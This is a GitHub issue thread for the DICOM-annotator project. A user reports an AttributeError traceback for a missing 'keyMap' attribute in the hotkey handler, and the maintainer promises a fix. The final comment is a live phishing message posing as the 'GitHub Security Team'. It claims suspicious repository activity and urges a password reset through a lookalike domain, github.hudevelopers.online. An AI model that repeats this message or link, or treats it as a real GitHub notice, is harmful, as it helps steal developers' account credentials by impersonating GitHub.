### ISSUE TITLE
Hotkeys are broken

### ISSUE THREAD

**Issue by Korijn** [sohailc/DICOM-annotator#2]
Looks like your (cool!) hotkeys have a bug!

```
Traceback (most recent call last):
  File "C:\Users\Korijn\Miniconda\envs\DICOM-annotator\lib\site-packages\matplotlib\backends\backend_qt5.py", line 315, in keyPressEvent
    FigureCanvasBase.key_press_event(self, key)
  File "C:\Users\Korijn\Miniconda\envs\DICOM-annotator\lib\site-packages\matplotlib\backend_bases.py", line 1833, in key_press_event
    self.callbacks.process(s, event)
  File "C:\Users\Korijn\Miniconda\envs\DICOM-annotator\lib\site-packages\matplotlib\cbook.py", line 540, in process
    proxy(*args, **kwargs)
  File "C:\Users\Korijn\Miniconda\envs\DICOM-annotator\lib\site-packages\matplotlib\cbook.py", line 415, in __call__
    return mtd(*args, **kwargs)
  File "DICOM-annotator.py", line 132, in keyPress
    drawerName = self.keyMap[key]
AttributeError: 'DICOMViewer' object has no attribute 'keyMap'
```

**Comment by sohailc** [comment]
Hmm.. Its a good thing this is still work in progress and I haven't
"officially" released my code yet. The bug has a simple fix and I will make
sure that my final version is thoroughly tested for bugs!

Thank you,

Sohail

**Comment by Korijn** [comment]
Of course, no worries. Just thought I'd let you know. :)

**Comment by GtdsIndonesia** [comment]
# Urgent: Security Alert for

Hello,

We've detected unusual activity in your GitHub repository . To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**
